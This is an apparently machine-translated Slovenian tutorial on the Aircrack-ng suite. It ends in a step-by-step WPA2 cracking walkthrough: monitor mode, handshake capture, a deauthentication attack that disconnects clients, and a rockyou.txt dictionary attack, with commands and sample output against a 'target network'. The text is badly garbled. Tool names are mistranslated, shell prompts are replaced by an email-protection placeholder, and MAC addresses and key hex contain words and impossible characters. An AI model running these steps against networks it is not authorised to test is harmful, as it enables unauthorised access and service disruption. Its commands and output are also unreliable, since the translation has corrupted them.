Aircrack-ng je celoten nabor programske opreme, namenjene preizkušanju varnosti omrežja WiFi. To ni samo eno orodje, ampak zbirka orodij, od katerih ima vsako svoj namen. Delati je mogoče na različnih področjih zaščite WiFi, na primer spremljanje dostopne točke, testiranje, napad na omrežje, razbijanje omrežja wifi in njegovo testiranje. Ključni cilj Aircracka je prestrezanje paketov in dešifriranje razpršilcev za razbijanje gesel. Podpira skoraj vse nove brezžične vmesnike. Aircrack-ng je izboljšana različica zastarele zbirke orodij Aircrack, ki se nanaša na Nova generacija . Nekaj odličnih orodij, ki skupaj delujejo pri večji nalogi.
Airmon:
Airmon-ng je vključen v komplet aircrack-ng, ki omrežno kartico vmesnika postavi v način monitorja. Omrežne kartice običajno sprejemajo samo pakete, ki so namenjeni njim, kot je opredeljeno v naslovu MAC omrežne kartice, z airmon-ng pa bodo sprejeti tudi vsi brezžični paketi, ne glede na to, ali so namenjeni njim ali ne. Ti paketi bi morali biti sposobni ujeti brez povezave ali preverjanja pristnosti z dostopno točko. Uporablja se za preverjanje stanja dostopne točke tako, da omrežni vmesnik preklopite v način monitorja. Najprej je treba konfigurirati brezžične kartice za vklop načina monitorja, nato pa uničiti vse procese v ozadju, če menite, da jih kateri koli proces moti. Po končanih procesih lahko na brezžičnem vmesniku omogočite način nadzora z izvajanjem spodnjega ukaza:
[zaščiteno po e -pošti]: ~ $sudoairmon-ng start wlan0#
Način monitorja lahko tudi onemogočite tako, da kadar koli ustavite airmon-ng s spodnjim ukazom:
[zaščiteno po e -pošti]: ~ $sudoairmon-ng stop wlan0#Airodump:
Airodump-ng se uporablja za seznam vseh omrežij, ki nas obdajajo, in za ogled dragocenih informacij o njih. Osnovna funkcionalnost airodump-ng je vohanje paketov, zato je v bistvu programirano, da zajame vse pakete okoli nas, medtem ko je v načinu monitorja. Zagnali ga bomo proti vsem povezavam okoli nas in zbrali podatke, kot so število odjemalcev, povezanih v omrežje, njihovi ustrezni naslovi mac, slog šifriranja in imena kanalov, nato pa začeli ciljati na naše ciljno omrežje.
Če vnesemo ukaz airodump-ng in mu za parameter dodelimo ime omrežnega vmesnika, lahko aktiviramo to orodje. Navedel bo vse dostopne točke, količino podatkovnih paketov, uporabljene metode šifriranja in preverjanja pristnosti ter ime omrežja (ESSID). S hekerskega vidika so naslovi mac najpomembnejša polja.
[zaščiteno po e -pošti]: ~ $sudoairodump-ng wlx0mon
Aircrack:
Aircrack se uporablja za razbijanje gesla. Ko zajamemo vse pakete z uporabo airodumpa, lahko ključ razbijemo z letalom. Te ključe razbije z dvema metodama PTW in FMS. Pristop PTW poteka v dveh fazah. Sprva se uporabljajo samo paketi ARP, šele nato, če ključ po iskanju ni razpokan, uporabi vse ostale zajete pakete. Prednost pristopa PTW je, da se za pokanje ne uporabljajo vsi paketi. Pri drugem pristopu, to je FMS, za razbijanje ključa uporabljamo tako statistične modele kot alge surove sile. Uporabite lahko tudi slovarsko metodo.
Predvajanje v zraku:
Airplay-ng uvaja pakete v brezžično omrežje za ustvarjanje ali pospeševanje prometa. Aireplay-ng lahko zajame pakete iz dveh različnih virov. Prvi je živo omrežje, drugi pa paketi iz že obstoječe datoteke pcap. Airplay-ng je uporaben med napadom odpravljanja pristnosti, ki cilja na brezžično dostopno točko in uporabnika. Poleg tega lahko nekatere napade, kot je napitek z latte kavo, izvedete z orodjem airplay-ng, ki vam omogoča, da dobite ključ iz odjemalčevega sistema. To lahko dosežete tako, da ulovite paket ARP in ga nato manipulirate ter pošljete nazaj v sistem. Odjemalec bo nato ustvaril paket, ki ga lahko zajame airodump in aircrack razbije ključ iz tega spremenjenega paketa. Nekatere druge možnosti napada airplay-ng vključujejo chopchop, fragmentarno predvajanje itd.
Letalska baza:
Airbase-ng se uporablja za pretvorbo računalnika vsiljivca v ogroženo povezavo, na katero se lahko povežejo drugi. Z Airbase-ng lahko trdite, da ste zakonita dostopna točka in izvajate napade 'človek v sredini' na računalnike, ki so priključeni na vaše omrežje. Tovrstni napadi se imenujejo Evil Twin Attacks. Osnovni uporabniki ne morejo ločiti med legalno dostopno točko in lažno dostopno točko. Torej grožnja zlobnih dvojčkov je med najbolj grozečimi brezžičnimi grožnjami, s katerimi se soočamo danes.
Airolib-ng:
Airolib pospeši postopek vdora s shranjevanjem in upravljanjem seznamov gesel in dostopne točke. Sistem za upravljanje baz podatkov, ki ga uporablja ta program, je SQLite3, ki je večinoma na voljo na vseh platformah. Razbijanje gesla vključuje izračun glavnega ključa v parih, skozi katerega se izvleče zasebni prehodni ključ (PTK). S pomočjo PTK lahko za določen paket določite identifikacijsko kodo okvirnega sporočila (MIC) in teoretično ugotovite, da je MIC podoben paketu, zato je bil, če je bil PTK pravilen, tudi PMK pravilen.
Če si želite ogledati sezname gesel in dostopati do omrežij, shranjenih v bazi podatkov, vnesite naslednji ukaz:
[zaščiteno po e -pošti]: ~ $sudoairolib-ng testdatabase –statsTu je baza podatkovnih baz podatkov, do katere želite dostopati ali jih ustvariti, –stats pa operacija, ki jo želite izvesti na njej. Na poljih baze podatkov lahko izvedete več operacij, na primer dajanje največje prednosti nekemu SSID -ju ali kaj podobnega. Če želite uporabiti airolib-ng z aircrack-ng, vnesite naslednji ukaz:
[zaščiteno po e -pošti]: ~ $sudoletenje v zraku-rtestdatabase wpa2.eapol.capTukaj uporabljamo že izračunane PMK, shranjene v testna baza podatkov za pospešitev procesa razbijanja gesel.
Razbijanje WPA/WPA2 z uporabo Aircrack-ng:
Poglejmo majhen primer, kaj lahko aircrack-ng naredi s pomočjo nekaj svojih odličnih orodij. Predhodni ključ omrežja WPA/WPA2 bomo zlomili z uporabo slovarske metode.
Prva stvar, ki jo moramo storiti, je, da navedemo omrežne vmesnike, ki podpirajo način monitorja. To lahko storite z naslednjim ukazom:
[zaščiteno po e -pošti]: ~ $sudoairmon-ngNabor čipov gonilnika vmesnika PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
Vidimo lahko vmesnik; zdaj moramo omrežni vmesnik, ki smo ga našli (wlx0), postaviti v način monitorja z naslednjim ukazom:
[zaščiteno po e -pošti]: ~ $sudoairmon-ng start wlx0
Omogočil je način monitorja na vmesniku, imenovanem wlx0mon .
Zdaj bi morali začeti poslušati oddaje bližnjih usmerjevalnikov prek našega omrežnega vmesnika, ki smo ga preklopili v način monitorja.
[zaščiteno po e -pošti]: ~ $sudoairodump-ng wlx0monCH5 ][Preteklo:30s][ 2020-12-02 00:17
Svetilniki BSSID PWR#Data, #/s CH MB ENC CIPHER AUTH ESSID
E4: 6F:13: 04: CE:31 -štiri, pet 62 27 0 154e WPA2 CCMP PSK CrackIt
C4: E9:84:76:10: BE-63 77 0 0 654e. WPA2 CCMP PSK Hackme
C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74: DAJE:88: FA:38: 02-68 28 2 0 enajst54e WPA2 CCMP PSK TP-Link_3802
Sonda BSSID STATION PWR Rate Lost Frames
E4: 6F:13: 04: CE:315C: 3A:Štiri, pet: D7: EA: 8B -3 0- 1e8 5
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13
Naše ciljno omrežje je Crackit v tem primeru, ki trenutno deluje na kanalu 1.
Tukaj, da razbijemo geslo ciljnega omrežja, moramo ujeti 4-smerno rokovanje, kar se zgodi, ko se naprava poskuša povezati z omrežjem. Zajamemo ga lahko z naslednjim ukazom:
[zaščiteno po e -pošti]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -v /doma wlx0-c : Kanal
–Bss : Bsid ciljnega omrežja
-v : Ime imenika, kamor bo postavljena datoteka pcap
Zdaj moramo počakati, da se naprava poveže z omrežjem, vendar obstaja boljši način za snemanje rokovanja. Naprave lahko odpravimo avtentifikacijo v AP z napadom na odpravo pristnosti z naslednjim ukazom:
[zaščiteno po e -pošti]: ~ $sudoaireplay-ng-0 -zaE4: 6F:13: 04: CE:31do : Bsid ciljnega omrežja
-0 : napad odkrivanja pristnosti
Odklopili smo vse naprave in zdaj moramo počakati, da se naprava poveže z omrežjem.
CH1 ][Preteklo:30s][ 2020-12-02 00:02][Rokovanje WPA: E4: 6F:13: 04: CE:31Svetilniki BSSID PWR RXQ#Data, #/s CH MB ENC CIPHER AUTH E
E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P
Sonda BSSID STATION PWR Rate Lost Frames
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1
E4: 6F:13: 04: CE:315C: 3A:Štiri, pet: D7: EA: 8B -290e- 1e0 22
E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt
E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1
Dobili smo zadetek in če pogledamo v zgornji desni kot tik ob času, vidimo, da je bil ujet stisk roke. Zdaj poglejte v določeno mapo ( /domov v našem primeru) za a .pcap mapa.
Za razbijanje ključa WPA lahko uporabimo naslednji ukaz:
[zaščiteno po e -pošti]: ~ $sudoletenje v zraku-a2 -vrockyou.txt-bE4: 6F:13: 04: CE:31rokovanje.capb: Bssid ciljnega omrežja
-a2: način WPA2
Rockyou.txt: Slovarmaparabljeno
Rokovanje.cap: Themapa kivsebuje ujet rokovanje
Aircrack-ng1.2beta3
[00:01:49] 10566ključi preizkušeni(1017.96do/s)
KLJUČNO NAJDENO! [dobil si me]
Glavni ključ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpetdesetC
Prehodni ključ: 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62B2 1B F7 6FpetdesetC025 62E9 5D71
Ključ do našega ciljnega omrežja je bil uspešno razbit.
Zaključek:
Brezžična omrežja so povsod, uporabljajo jih vsa podjetja, od delavcev, ki uporabljajo pametne telefone, do industrijskih krmilnih naprav. Po raziskavah bo skoraj 20 odstotkov internetnega prometa leta 2021 prek WiFi. Brezžična omrežja imajo številne prednosti, komunikacija zunaj vrat, hiter dostop do interneta na mestih, kjer je skoraj nemogoče postaviti žice, lahko razširi omrežje brez namestitve kablov za katerega koli drugega uporabnika in lahko preprosto povežete svoje mobilne naprave z domačimi pisarnami, ko vas ni.
Kljub tem prednostim obstaja velik vprašaj o vaši zasebnosti in varnosti. Kot ta omrežja; v dosegu oddajnika so usmerjevalniki odprti za vse, jih je mogoče zlahka napasti in vaše podatke je mogoče zlahka ogroziti. Če ste na primer povezani z nekim javnim brezžičnim omrežjem Wi -Fi, lahko vsak, ki je povezan s tem omrežjem, preprosto preveri vaš omrežni promet z uporabo nekaj inteligence in s pomočjo čudovitih orodij, ki so na voljo, in ga celo izbriše.